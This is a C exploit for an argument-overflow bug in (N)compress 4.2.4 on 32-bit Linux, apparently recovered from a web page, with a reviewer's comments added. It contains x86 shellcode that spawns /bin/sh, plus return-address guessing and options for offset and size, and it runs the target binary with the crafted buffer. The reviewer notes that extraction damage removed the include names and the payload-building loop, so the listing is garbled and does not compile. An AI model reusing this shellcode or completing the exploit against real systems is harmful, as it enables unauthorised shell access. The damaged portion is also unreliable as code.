/*
 * (N)compress 4.2.4 argv-overflow exploit, 32-bit Linux/x86, as recovered
 * from a web page.  Documentation-only review; the code tokens are left
 * exactly as found.
 *
 * NOTE(review): the listing is damaged by the HTML extraction and does not
 * compile as-is:
 *   - The three #include directives below lost their header names (the
 *     angle-bracket text was dropped).  Given the calls that survive
 *     (printf, exit, malloc, atoi, strtoll, getopt, execl) they were most
 *     likely <stdio.h>, <stdlib.h> and <unistd.h> -- confirm against an
 *     original copy before restoring them.
 *   - In main(), everything from the `i<len` condition of the buffer-filling
 *     loop up to the first banner printf was swallowed the same way, so the
 *     loop body that actually lays out the payload in `buffer` is missing.
 *     It is deliberately NOT reconstructed here.
 * Treat this as an artefact for study, not a working tool.
 */
#include
#include
#include

#define VULN "/usr/bin/compress"   /* program exec'd with the crafted argument */
#define NOP 0x90909090             /* four x86 NOP (0x90) bytes packed into one 32-bit word */
#define NOPLEN 500                 /* presumably the NOP-sled length; its only use was in the lost loop body */

/*
 * This shellcode was taken from some exploit I dont know who wrote it.
 *
 * NOTE(review): opaque binary blob of unknown provenance -- never run it
 * outside an isolated lab.  Reading the bytes: "\xb0\x0b" / "\xcd\x80" are
 * `mov al,11; int 0x80` (Linux i386 execve) and the string ends in
 * "/bin/sh", so it presumably spawns a shell; the trailing "\x31\xdb ...
 * \x40\xcd\x80" looks like an exit() call.  The identifier is misspelled
 * ("hellcode") in the original and is kept byte-identical.
 */
const unsigned char linux_x86_exec_hellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
    "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
    "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
    "\xff\xff/bin/sh";

/*
 * Return (an approximation of) the caller's stack pointer.
 *
 * Loads %esp into %eax and relies on %eax being the i386 return register:
 * there is no C `return` statement, so reading the result is undefined
 * behaviour and only happens to work on 32-bit x86 without optimisation.
 * On x86-64 the inline asm itself is invalid.
 */
unsigned long get_sp(void) {
    __asm__(" mov %esp, %eax");
}

/*
 * Print the banner and option summary, then terminate with status 1.
 *
 * @param prog  argv[0] of this program, echoed in the usage line.
 * Never returns; this is why the 'h' case in main() needs no `break`.
 */
void usage(char *prog) {
    printf("<+> (N)compress 4.2.4 Exploit\n");
    printf("<+> By: Lunar Fault [ElectronicSouls]\n");
    printf("<+> Information System Advancement in Penetration (ISAP) Laboratories \n");
    printf(" usage: %s [options]\n", prog);
    printf("\t\t-h help\n");
    printf("\t\t-o Example: 100\n");      /* offset added to the return address */
    printf("\t\t-r Example: 0xbfffc680\n"); /* explicit return address (strtoll, base auto) */
    printf("\t\t-s Example: 1056\n");     /* payload size in bytes */
    exit(1);
}

/*
 * Entry point: build an oversized argument and exec VULN with it.
 *
 * NOTE(review): the parameter names are swapped relative to convention --
 * `argv` is the argument COUNT and `argc` the argument VECTOR.  The calls
 * getopt(argv, argc, ...) and usage(argc[0]) are consistent with that
 * swap, so the code is correct, just misleading.
 *
 * Review findings (left unfixed in this doc-only edit):
 *   - `ret` is an int but holds a stack address; the strtoll() result
 *     from -r is silently truncated to int.
 *   - `len` is a long but is printed with %d, and `ret` (int) with %x;
 *     both are format/argument mismatches.
 *   - `len` comes from atoi() with no range check, and the malloc(len)
 *     result is never checked for NULL before the (lost) loop writes to it.
 *   - `tmpbuf` is declared and never used.
 *   - execl() is terminated with a bare `0` rather than `(char *)NULL`;
 *     on ILP32 this works, on LP64 a 4-byte 0 in varargs is not a null
 *     pointer.  If execl() returns it has failed, yet main still returns 0.
 */
int main(int argv, char *argc[]) {
    int i, c, ret, offset;
    long len;
    char *buffer, tmpbuf[10];   /* tmpbuf: unused */

    offset = 0;
    len = 1056;                 /* default payload size, overridable with -s */
    ret = get_sp();
    ret = ret - 100;            /* Subtracting 100 from sp to bring the return somewhere in the NOP
                                 * (a guess at the target's stack layout; -r replaces it, -o shifts it) */

    if (argv > 1) {
        while ((c = getopt (argv, argc, "r:s:o:h"))!=EOF) {
            switch(c) {
            case 'r':
                ret = strtoll(optarg, NULL, 0);   /* base 0: accepts 0x... hex */
                break;
            case 's':
                len = atoi(optarg);
                break;
            case 'o':
                offset = atoi(optarg);
                break;
            case 'h':
                usage(argc[0]);                   /* exits; no break needed */
            }
        }
    }

    buffer = (char *) malloc(len);   /* NOTE(review): unchecked allocation */
    ret = ret + offset;

    /*
     * NOTE(review): the text between `i` and `(N)compress` on the next line
     * was lost in extraction (see file header).  The original presumably
     * read `i<len` and populated `buffer` -- NOP, NOPLEN, the shellcode
     * array and `ret` are otherwise unused in what survives -- before
     * printing the same banner that usage() prints.  Not reconstructed.
     */
    for (i=0;i (N)compress 4.2.4 Exploit\n");
    printf("<+> By: Lunar Fault [ElectronicSouls]\n");
    printf("<+> Information System Advancement in Penetration (ISAP) Laboratories \n");
    printf("<*> Offset = %d\n", offset);
    printf("<*> Return = 0x%.8x\n", ret);   /* %x with an int argument */
    printf("<*> Size = %d\n\n", len);       /* %d with a long argument */

    /* Replace this process with VULN, passing the crafted buffer as argv[1]. */
    execl(VULN, VULN, buffer, 0);           /* NOTE(review): terminator should be (char *)NULL */
    return 0;                               /* reached only if execl() failed */
}